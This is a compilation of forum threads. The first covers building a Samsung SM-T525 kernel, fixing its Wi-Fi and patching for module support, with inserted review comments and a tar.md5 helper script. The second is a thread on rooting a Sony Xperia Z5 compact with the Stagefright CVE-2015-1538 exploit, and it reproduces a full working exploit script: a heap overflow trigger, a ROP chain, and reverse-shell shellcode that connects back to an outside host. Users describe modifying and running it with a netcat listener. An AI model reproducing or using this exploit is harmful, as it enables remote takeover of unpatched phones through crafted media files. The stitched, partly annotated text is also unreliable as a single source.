Instructions to build a kernel from Samsung sources:
1. Download and unpack the source from http://opensource.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=sm-t525
2. Download and unpack the Android NDK from https://developer.android.com/tools/sdk/ndk/index.html
3. Set environment variables (use gcc 4.6, not 4.8):
export CROSS_COMPILE="~/android/android-ndk-r9d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86_64/bin/arm-linux-androideabi-"
export ARCH="arm"
4. If you want to add loadable modules support, apply the patch modules_support.patch from the attachment
patch -p1 < modules_support.patch
5. Create the kernel config
make VARIANT_DEFCONFIG=msm8974_sec_picassoeur_defconfig msm8974_sec_defconfig SELINUX_DEFCONFIG=selinux_defconfig
6. Build the kernel
make -j3
7. Build the device tree image
./tools/dtbTool -o dt.img -s 2048 -p ./scripts/dtc/ ./arch/arm/boot/
8. Build boot.img (default ramdisk image in the attachment)
./tools/mkbootimg --kernel ./arch/arm/boot/zImage --ramdisk ramdisk.cpio.gz --cmdline 'console=null androidboot.hardware=qcom user_debug=31 msm_rtb.filter=0x37 ehci-hcd.park=3' --base 0x00000000 --pagesize 2048 --ramdisk_offset 0x02000000 --tags_offset 0x01E00000 --dt dt.img -o boot.img
9. Create a .tar.md5 to flash with Odin
tar -H ustar -c boot.img > boot.tar
md5sum -t boot.tar >> boot.tar
mv boot.tar boot.tar.md5
10. To fix Wi-Fi, edit build.prop on your device and change ro.securestorage.support from true to false
ro.securestorage.support=false
GitHub: https://github.com/vanyasvl/android_kernel_samsung_picassoeur
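Step 9 above packages boot.img the way Odin expects: a plain ustar archive with the output of `md5sum -t boot.tar` appended to the archive itself. The following Python 3 script is an added example, not code from the thread or from the linked repository; it reproduces that layout with the standard library and adds the check Odin performs when flashing (recompute the digest of everything before the trailer and compare), which is the first thing to test when a downloaded .tar.md5 refuses to flash. The file names and the stand-in boot.img content are constructed for the example.

```python
import hashlib
import io
import tarfile


def build_tar_md5(image_bytes, image_name="boot.img", tar_name="boot.tar"):
    """Return the bytes of boot.tar.md5: a ustar archive holding image_name, followed
    by the md5sum line of that archive, as `md5sum -t boot.tar >> boot.tar` appends it."""
    buf = io.BytesIO()
    # `tar -H ustar` selects the POSIX ustar format; tarfile writes the same layout.
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tar:
        info = tarfile.TarInfo(name=image_name)
        info.size = len(image_bytes)
        tar.addfile(info, io.BytesIO(image_bytes))
    archive = buf.getvalue()
    digest = hashlib.md5(archive).hexdigest()
    # md5sum prints "<hex>  <name>\n"; that whole line becomes the trailer.
    trailer = "{}  {}\n".format(digest, tar_name).encode("ascii")
    return archive + trailer


def split_tar_md5(data):
    """Separate the archive from the md5sum trailer. tar pads the archive with NUL
    blocks and the md5sum line contains no NUL, so the trailer is everything after
    the last NUL byte."""
    last_nul = data.rfind(b"\x00")
    if last_nul < 0:
        raise ValueError("no ustar padding found; not a tar.md5")
    return data[:last_nul + 1], data[last_nul + 1:]


def verify_tar_md5(data):
    """Recompute the archive digest and compare it with the trailer, as Odin does.
    Returns a dict with ok/name/expected/actual so a mismatch can be reported."""
    archive, trailer = split_tar_md5(data)
    actual = hashlib.md5(archive).hexdigest()
    try:
        expected, name = trailer.decode("ascii").rstrip("\n").split("  ", 1)
    except (UnicodeDecodeError, ValueError):
        return {"ok": False, "name": None, "expected": None, "actual": actual}
    return {"ok": actual == expected, "name": name, "expected": expected, "actual": actual}


def members_of(data):
    """List the files inside the archive part, to confirm boot.img sits at the top
    level under the name the flasher expects."""
    archive, _ = split_tar_md5(data)
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tar:
        return tar.getnames()


if __name__ == "__main__":
    # Constructed stand-in for a real boot.img (a real one is several megabytes).
    fake_boot_img = b"ANDROID!" + b"\x00" * 56
    packaged = build_tar_md5(fake_boot_img)
    print(members_of(packaged), verify_tar_md5(packaged))
    # Flip one byte inside the image to show the check catching a corrupt download.
    damaged = bytearray(packaged)
    damaged[512] ^= 0xFF          # byte 512 is the first byte of the image data
    print(verify_tar_md5(bytes(damaged))["ok"])
```

Because the digest covers the archive only, the trailer must be split off before hashing; appending the md5sum line does not change what Odin verifies, which is why the same file can be zipped for distribution and checked again after unpacking.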
I'm not a builder, but when wifi doesn't work that usually means a mismatch between kernel and rom.
Sent from my SM-T320 using Tapatalk
Hello. I'm trying to build the stock Samsung kernel for the Tab Pro 10.1 SM-T525 and I have a problem:
Wi-Fi isn't working on the built kernel. All kernel configs are default from Samsung; Bluetooth and LTE work OK.

I need help debugging the Wi-Fi problem.
The "ip a" command shows the wlan0 network device, but Wi-Fi can't be enabled from the configuration.

My steps to build the kernel:
Download the source from http://opensource.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=sm-t525
unpack it to ~/android/kernel

cd ~/android/kernel
export CROSS_COMPILE="/home/vanyas/android/android-ndk-r9d_x64/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86_64/bin/arm-linux-androideabi-"
export ARCH="arm"

make VARIANT_DEFCONFIG=msm8974_sec_picassoeur_defconfig msm8974_sec_defconfig SELINUX_DEFCONFIG=selinux_defconfig
make -j3

./tools/dtbTool -o dt.img -s 2048 -p ./scripts/dtc/ ./arch/arm/boot/

unpack the original boot.img with split_boot to the boot folder

./tools/mkbootimg --kernel ./arch/arm/boot/zImage --ramdisk boot/boot.img-ramdisk.cpio.gz --cmdline 'console=null androidboot.hardware=qcom user_debug=31 msm_rtb.filter=0x37 ehci-hcd.park=3' --base 0x00000000 --pagesize 2048 --ramdisk_offset 0x02000000 --tags_offset 0x01E00000 --dt dt.img -o boot.img

tar -H ustar -c boot.img > boot.tar
md5sum -t boot.tar >> boot.tar
mv boot.tar boot.tar.md5
For the sm-t320, the kernel is built with version checks on the modules. This is what I did to allow the wlan module to load:
https://github.com/crpalmer/android...mmit/76275b29746dfeab37efeab6c2787af9acd3394c
You'd obviously need to specify the right version string (it should be in the output of dmesg if this is why your wlan isn't working).
Also, if you plan on sharing the kernel, you should zip the .tar.md5 file as I had problems with it failing to flash after downloading when I released just a .tar.md5.
crpalmer said:
For the sm-t320, the kernel is built with version checks on the modules. This is what I did to allow the wlan module to load:
https://github.com/crpalmer/android...mmit/76275b29746dfeab37efeab6c2787af9acd3394c
You'd obviously need to specify the right version string (it should be in the output of dmesg if this is why your wlan isn't working).
Also, if you plan on sharing the kernel, you should zip the .tar.md5 file as I had problems with it failing to flash after downloading when I released just a .tar.md5.
Thanks, but it is not a module load problem. The SM-T525 kernel builds without modules support, and the Wi-Fi driver (bcm4339) is compiled into the kernel.
vanyas said:
Thanks, but it is not a module load problem. The SM-T525 kernel builds without modules support, and the Wi-Fi driver (bcm4339) is compiled into the kernel.
That's interesting. The sm-t320 is a prima chipset which is built as a module.
Do you see anything in the logcat or the dmesg related to the wlan, bcm4339, wifi, etc?
There are patches for the SM-T525 kernel source that resolve the problem with "modules support" compilation:
--- kernel_orig/arch/arm/mm/proc-syms.c 2014-04-09 12:10:04.846114000 +1100
+++ kernel/arch/arm/mm/proc-syms.c 2014-04-09 11:54:33.894114000 +1100
@@ -18,7 +18,6 @@
#ifndef MULTI_CPU
EXPORT_SYMBOL(cpu_dcache_clean_area);
EXPORT_SYMBOL(cpu_set_pte_ext);
-EXPORT_SYMBOL(cpu_tima_set_pte_ext);
#else
EXPORT_SYMBOL(processor);
#endif
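Review bot: the removal of EXPORT_SYMBOL(cpu_tima_set_pte_ext) from the #ifndef MULTI_CPU branch comes with no explanation. If the export fails to build because the symbol is not defined for this configuration, say so in the commit message, and check that no code under drivers/ still references cpu_tima_set_pte_ext, since any module that does will no longer link once the export is gone.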
--- kernel_orig/arch/arm/mach-msm/sec-switch.c 2014-01-23 15:34:20.000000000 +1100
+++ kernel/arch/arm/mach-msm/sec-switch.c 2014-04-09 11:29:26.322114000 +1100
@@ -2565,7 +2565,7 @@
pr_info("%s: Ignore Cable setting, Not LPM mode\n", __func__);
}
}
-EXPORT_SYMBOL(fsa9485_set_mhl_cable)
+EXPORT_SYMBOL(fsa9485_set_mhl_cable);
boon fsa9485_muic_is_mhl_attached(void)
{
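Review bot: adding the missing semicolon after EXPORT_SYMBOL(fsa9485_set_mhl_cable) is the right fix; without it the macro expansion runs straight into the following function definition. The unchanged context line reads `boon fsa9485_muic_is_mhl_attached(void)`: if that is really in the source rather than a copy artifact it will not compile either and should read `bool`, so verify it before applying the patch.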
--- kernel_orig/Makefile 2014-01-23 15:34:19.000000000 +1100
+++ kernel/Makefile 2014-04-09 20:55:48.278114000 +1100
@@ -351,7 +351,7 @@
CHECKFLAGS := -D__linux__ -Dlinux -D__STDC__ -Dunix -D__unix__ \
-Wbitwise -Wno-return-void $(CF)
-CFLAGS_MODULE =
+CFLAGS_MODULE = -fno-pic
AFLAGS_MODULE =
LDFLAGS_MODULE =
CFLAGS_KERNEL =
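Review bot: `CFLAGS_MODULE = -fno-pic` is set in the top-level Makefile, where it applies to every architecture. If the flag is only needed so the ARM module loader can relocate modules, it belongs in arch/arm/Makefile or behind an architecture check, with a comment recording why modules must not be built position-independent; otherwise the next merge of upstream Makefile changes will silently drop it and module loading will break again.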
Yes! I did it!
To fix wifi: ro.securestorage.support=false in build.prop
thornev said:
I'm not a builder, but when wifi doesn't work that usually means a mismatch between kernel and rom.
Sent from my SM-T320 using Tapatalk
I am a builder and what he said is correct.
Samsung did some crazy stuff with Knox.
scrosler said:
I am a builder and what he said is correct.
Samsung did some crazy stuff with Knox.
Can you make a thread showing us some of the difficulties you encountered working around Knox?
Silkmeister
@Silkmeister1, @Scott, @vanyas, @crpalmer:
I do have a Wi-Fi/BT issue with my (second hand) device. Wi-Fi/BT cannot be enabled in Android. My first suspect was a broken connection, but I couldn't find anything obvious.
I tried to update the stock ROM and found an issue with ODIN. The stock ROM was not installable; it returns a size error in the hidden image. (??? what is in there ???). I installed the latest LOS and checked the boot messages.
Do you think this can be a software issue? Is there anything missing (stuff in the hidden partition)?
Code:
failed to power up wifi chip, retry again (4 left) **
[ 4.035535] ## wifi_remove
[ 4.035538] wifi_set_power = 0
[ 4.035541] ------------------------------------------------
[ 4.035542] ------------------------------------------------
[ 4.035544] brcm_wlan_power Enter: power off
[ 4.035548] WL_REG_ON off-step : [1]
[ 4.035554] WL_REG_ON off-step-2 : [0]
[ 4.139482] wifi_set_carddetect = 0
[ 4.139485] brcm_wifi_status:359 status 0
[ 4.139487] mmc0: Slot status change detected (1 -> 0)
[ 4.139870] wifi_set_power = 1
[ 4.139873] ------------------------------------------------
[ 4.139874] ------------------------------------------------
[ 4.139876] brcm_wlan_power Enter: power on
[ 4.139880] WL_REG_ON on-step : [0]
[ 4.139887] WL_REG_ON on-step-2 : [1]
[ 4.349477] wifi_set_carddetect = 1
[ 4.349480] brcm_wifi_status:359 status 1
…
Complete bootlog can be seen here in the attachment:
https://forum.xda-developers.com/showpost.php?p=72624259&postcount=213
Any help is welcome!
Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?
Hello to the community!
I've seen a video on the Zimperium Stagefright Detector App page in the Google Play Store showing how you can get root access to an Android system. And that seems to be quite easy - just executing a Python script.
So my questions are:
- Is the Sony Xperia Z5 compact vulnerable to the CVE-2015-1538 exploit? (I haven't tested it yet on my Sony Xperia Z5 compact device)
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the necessary files in the system, maybe manually via telnet?
- Can this be done without unlocking the bootloader?
- Which files have to be changed, and what are the changes, to get permanent root access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Regards from Dresden
"Klaus"
klausstoertebeker said:
- Is the Sony Xperia Z5 compact vulnerable to the CVE-2015-1538 exploit? (I haven't tested it yet on my Sony Xperia Z5 compact device)
Yes, according to Stagefright Detector. I could not get Stagefright to work on my Z5C, but that is probably due to my shortcomings.
klausstoertebeker said:
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the necessary files in the system, maybe manually via telnet?
Probably not. Stagefright will give you "media" or "system" privileges. These users can't remount the system partition to make it writable. Also, Sony has strengthened the security using a kernel module (Sony RIC) that disallows any user (even root) from remounting the system partition.
However, you could maybe (very unlikely) find a system writable executable file in ramdisk and hope for root to execute your modified file.
klausstoertebeker said:
- Can this be done without unlocking the bootloader?
AFAIK, no one has succeeded yet.
klausstoertebeker said:
- Which files have to be changed, and what are the changes, to get permanent root access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Permanent root on this device is rather tough to achieve. You can't modify system partition due to dm-verity (verified boot), and you can most likely not modify boot partition without unlocking the bootloader.
As you say, your best shot is to achieve temporary root by exploiting some kernel module/driver and then dump TA. This is of course not trivial.
There is maybe another way to get both root and DRM features. As system user (achieved using Stagefright), you can query the "tad" socket to retrieve the DRM keys. This is how Sony is reading the DRM keys when verifying things. When you have the DRM keys you can unlock BL, root, and then modify your ROM to spoof "tad" socket responses with your previously extracted keys. Unlikely, but possibly, you could even write the keys back to the TA partition.
This method requires system privileges. If some clever one helps me getting Stagefright working, I could probably extract the DRM keys.
Maybe the CVE-2015-3636 is easier to use?
Hi nilezon!
Due to the fact I'm on vacation I can't try to get the CVE-2015-1538 exploit working - my SONY Xperia Z5 compact is at home
But I surfed the Internet and found another exploit that's maybe easier to be used to get root privileges: CVE-2015-3636
And if I get the document right, a non-privileged app could be used to get root privileges using a pointer use-after-free bug in the kernel. I'm not an app programmer (I just programmed aviation software parts for jet-propelled military planes), but it seems to me that the way described in the linked document is easier to go than the way using CVE-2015-1538 - I read on the internet that Sony is currently delivering a patch closing the Stagefright exploit.
To find out if my phone (SONY Xperia Z1 compact) and tablet are vulnerable to the CVE-2015-3636, I used the app VTS for Android.
If this is a walkable way and you could write an app, maybe the code for backing up the DRM keys or the whole TA Partition could be included into that app using the CVE-2015-3636 exploit to get even temporary root privileges...
What do you think?
Regards
"Klaus"
klausstoertebeker said:
...
AFAIK, the Z5 family is not vulnerable to the CVE-2015-3636 exploit.
Generating the CVE-2015-1538 mp4 file
Hi nilezon,
I was able to generate the CVE-2015-1538 file by making three modifications to the Python code published by Joshua J. Drake:
Code:
#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!
# MMS is the most dangerous attack vector, but not the only one...
#
# DISCLAIMER: This exploit is for testing and educational purposes only. Any
# other usage for this code is not allowed. Use at your own risk.
#
# "With great power comes great responsibility." - Uncle Ben
#
import struct
import socket
#
# Creates a single MP4 atom - LEN, TAG, DATA
#
def make_chunk(tag, data):
if len(tag) != 4:
raise 'Yo! They call it "FourCC" for a reason.'
ret = struct.pack('>L', len(data) + 8)
ret += tag
ret += data
return ret
#
# Make an 'stco' atom - Sample Table Chunk Offets
#
def make_stco(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mNumChunkOffsets
return make_chunk('stco', ret+extra)
#
# Make an 'stsz' atom - Sample Table Size
#
def make_stsz(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mDefaultSampleSize
ret += struct.pack('>L', 0) # mNumSampleSizes
return make_chunk('stsz', ret+extra)
#
# Make an 'stts' atom - Sample Table Time-to-Sample
#
def make_stts():
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mTimeToSampleCount
return make_chunk('stts', ret)
#
# This creates a single Sample Table Sample-to-Chunk entry
#
def make_stsc_entry(start, per, desc):
ret = ''
ret += struct.pack('>L', start + 1)
ret += struct.pack('>L', per)
ret += struct.pack('>L', desc)
return ret
#
# Make an 'stsc' chunk - Sample Table Sample-to-Chunk
#
# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
# cause a heap overflow.
#
# def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True):
ret = struct.pack('>L', 0) # version/flags
# this is the clean version...
if not do_overflow:
ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets
ret += 'Z' * (12 * num_alloc)
return make_chunk('stsc', ret)
# now the explicit version. (trigger the bug)
ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
# fill in the entries that will overflow the buffer
for x in range(0, num_write):
ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
ret = make_chunk('stsc', ret)
# patch the data_size
ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:]
return ret
#
# Build the ROP chain
#
# ROP pivot by Georg Wicherski! Thanks!
#
"""
(gdb) x/10i __dl_restore_core_regs
0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}
0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}
"""
"""
b0001144 <__dl_mprotect>:
b0001144: e92d0090 push {r4, r7}
b0001148: e3a0707d mov r7, #125 ; 0x7d
b000114c: ef000000 svc 0x00000000
b0001150: e8bd0090 pop {r4, r7}
b0001154: e1b00000 movs r0, r0
b0001158: 512fff1e bxpl lr
b000115c: ea0015cc b b0006894 <__dl_raise+0x10>
"""
def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
rop = ''
rop += struct.pack('<L', sp_addr + off + 0x10) # new sp
rop += struct.pack('<L', 0xb0002a98) # new lr - pop {pc}
rop += struct.pack('<L', 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 - base address (page aligned)
rop += struct.pack('<L', 0x1000) # new r1 - length
rop += struct.pack('<L', 7) # new r2 - protection
rop += struct.pack('<L', 0xd000d003) # new r3 - scratch
rop += struct.pack('<L', 0xd000d004) # new r4 - scratch
rop += struct.pack('<L', 0xb0001144) # new pc - _dl_mprotect
native_start = sp_addr + 0x80
rop += struct.pack('<L', native_start) # address of native payload
#rop += struct.pack('<L', 0xfeedfed5) # top of stack...
# linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
buf = ''
# fork
buf += '\x02\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# continue if not parent...
buf += '\x00\x00\x50\xe3'
buf += '\x02\x00\x00\x0a'
# exit parent
buf += '\x00\x00\xa0\xe3'
buf += '\x01\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# setsid in child
buf += '\x42\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# socket/connect/dup2/dup2/dup2
buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
buf += '\xe3\x00\x00\x00\xef'
# execve(shell, argv, env)
buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
buf += '\xef\x02\x00'
# Add the connect back host/port
buf += struct.pack('!H', cb_port)
cb_host = socket.inet_aton(cb_host)
buf += struct.pack('=4s', cb_host)
# shell -
buf += '/system/bin/sh\x00\x00'
# argv -
buf += 'sh\x00\x00'
# env -
buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'
# Add some identifiable stuff, just in case something goes awry...
rop_start_off = 0x34
x = rop_start_off + len(rop)
while len(rop) < 0x80 - rop_start_off:
rop += struct.pack('<L', 0xf0f00000+x)
x += 4
# Add the native payload...
rop += buf
return rop
#
# Build an mp4 that exploits CVE-2015-1538 #1
#
# We mimic meow.3gp here...
#
def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
chunks = []
# Build the MP4 header...
ftyp = 'mp42'
ftyp += struct.pack('>L', 0)
ftyp += 'mp42'
ftyp += 'isom'
chunks.append(make_chunk('ftyp', ftyp))
# Note, this causes a few allocations...
moov_data = ''
moov_data += make_chunk('mvhd',
struct.pack('>LL', 0, 0x41414141) +
('B' * 0x5c) )
# Add a minimal, verified trak to satisfy mLastTrack being set
moov_data += make_chunk('trak',
make_chunk('stbl',
make_stsc(0x28, 0x28) +
make_stco() +
make_stsz() +
make_stts() ))
# Spray the heap using a large tx3g chunk (can contain binary data!)
"""
0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
"""
page = ''
off = 0 # the offset to the next object
off += 8
page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28) # _vptr.RefBase (for when we smash mDataSource)
page += struct.pack('<L', sp_addr + off) # mRefs
off += 16
page += struct.pack('<L', 1) # mStrong
page += struct.pack('<L', 0xc0dedbad) # mWeak
page += struct.pack('<L', sp_addr + off) # mBase
page += struct.pack('<L', 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
off += 8
page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
page += struct.pack('<L', 0xf00dbabe) # mBase.mRefs (unused)
off += 16
page += struct.pack('<L', 0xc0de0000 + 0x00) # vtable entry 0
page += struct.pack('<L', 0xc0de0000 + 0x04) # vtable entry 4
page += struct.pack('<L', 0xc0de0000 + 0x08) # vtable entry 8
page += struct.pack('<L', newpc_val) # vtable entry 12
rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
x = len(page)
while len(page) < 4096:
page += struct.pack('<L', 0xf0f00000+x)
x += 4
off = 0x34
page = page[:off] + rop + page[off+len(rop):]
spray = page * (((2*1024*1024) / len(page)) - 20)
moov_data += make_chunk('tx3g', spray)
block = 'A' * 0x1c
bigger = 'B' * 0x40
udta = make_chunk('udta',
make_chunk('meta',
struct.pack('>L', 0) +
make_chunk('ilst',
make_chunk('cpil', make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
make_chunk('trkn', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
make_chunk('disk', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('aART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('gnre', make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
)
)
moov_data += udta
# Make the nasty trak
tkhd1 = ''.join([
'\x00', # version
'D' * 3, # padding
'E' * (5*4), # {c,m}time, id, ??, duration
'F' * 0x10, # ??
struct.pack('>LLLLLL',
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0), # dy
'G' * 0x14
])
trak1 = ''
trak1 += make_chunk('tkhd', tkhd1)
mdhd1 = ''.join([
'\x00', # version
'D' * 0x17, # padding
])
mdia1 = ''
mdia1 += make_chunk('mdhd', mdhd1)
mdia1 += make_chunk('hdlr', 'F' * 0x3a)
dinf1 = ''
dinf1 += make_chunk('dref', 'H' * 0x14)
minf1 = ''
minf1 += make_chunk('smhd', 'G' * 0x08)
minf1 += make_chunk('dinf', dinf1)
# Build the nasty sample table to trigger the vulnerability here.
stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER
# Add the stbl to the minf chunk
minf1 += make_chunk('stbl', stbl1)
# Add the minf to the mdia chunk
mdia1 += make_chunk('minf', minf1)
# Add the mdia to the track
trak1 += make_chunk('mdia', mdia1)
# Add the nasty track to the moov data
moov_data += make_chunk('trak', trak1)
# Finalize the moov chunk
moov = make_chunk('moov', moov_data)
chunks.append(moov)
# Combine outer chunks together and voila.
data = ''.join(chunks)
return data
if __name__ == '__main__':
import sys
# import mp4
import argparse
def write_file(path, content):
with open(path, 'wb') as f:
f.write(content)
def addr(sval):
if sval.startswith('0x'):
return int(sval, 16)
return int(sval)
# The address of a fake StrongPointer object (sprayed)
sp_addr = 0x41d00010 # takju @ imm76i - 2MB (via hangouts)
# The address to of our ROP pivot
newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
# Allow the user to override parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--connectback-host', dest='cbhost', default='31.3.3.7')
parser.add_argument('-p', '--connectback-port', dest='cbport', type=int, default=12345)
parser.add_argument('-s', '--spray-address', dest='spray_addr', type=addr, default=None)
parser.add_argument('-r', '--rop-pivot', dest='rop_pivot', type=addr, default=None)
parser.add_argument('-o', '--output-file', dest='output_file', default='cve-2015-1538-1.mp4')
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(-1)
if args.spray_addr == None:
args.spray_addr = sp_addr
if args.rop_pivot == None:
args.rop_pivot = newpc_val
# Build the MP4 file...
# data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
print('[*] Saving crafted MP4 to %s ...' % args.output_file)
write_file(args.output_file, data)
(The modifications are: changing line 77 from "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False)" to "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True)" to achieve using the exploit, commenting out "import mp4" in line 353 to avoid compiler errors, and changing line 390 from "data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to "data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to avoid compiler errors.)
To run the code I used the "Wing IDE" in combination with "Python 2.7.3". I used the -c <reconnect-IP-address> and -p <reconnect-port> arguments.
But I can't get reconnected from my Sony Xperia Z5 compact because I don't know how to backlisten to the phone and switch to a shell. Maybe the computer in the Zimperium video shows a Linux machine and I'm just running a Windows 7 machine.
But maybe it helps you on the way to save the DRM keys.
(By the way: in the video the "id" command after the first change of directory shows "uid=0(root)" and "gid=0(root)", which means to me that the user has root privileges. Or am I wrong?)
"Klaus"
But the Z3+ old firmware is vulnerable. Maybe you can use a Z3+ system folder on the Z5! They are quite the same!
Sent from my E6533 using XDA Free mobile app
Good job on modifying the script. I could run it on my linux box without any modifications and it produced an MP4. I then moved it over to my Z5C and launched it. After that I tried a reverse shell (netcat -l -p <port>) but got nothing. Then I went out on the interwebs to investigate and here are a couple of pointers.
1. The code is written to exploit the hangouts app specifically. So running the mp4 with any other player isn't going to work.
2. The code is written to take default values if -s and -r are not given to the scripts as arguments. The default values are said to only work on the Nexus device that it was written for.
3. The video you saw was edited to make it look really simple, or another script was run that they didn't show us.
More information can be found in the comments around here:
http://null-byte.wonderhowto.com/forum/stagefright-exploit-released-0164432/
Happy exploiting, Merry Christmas.
~Aeny
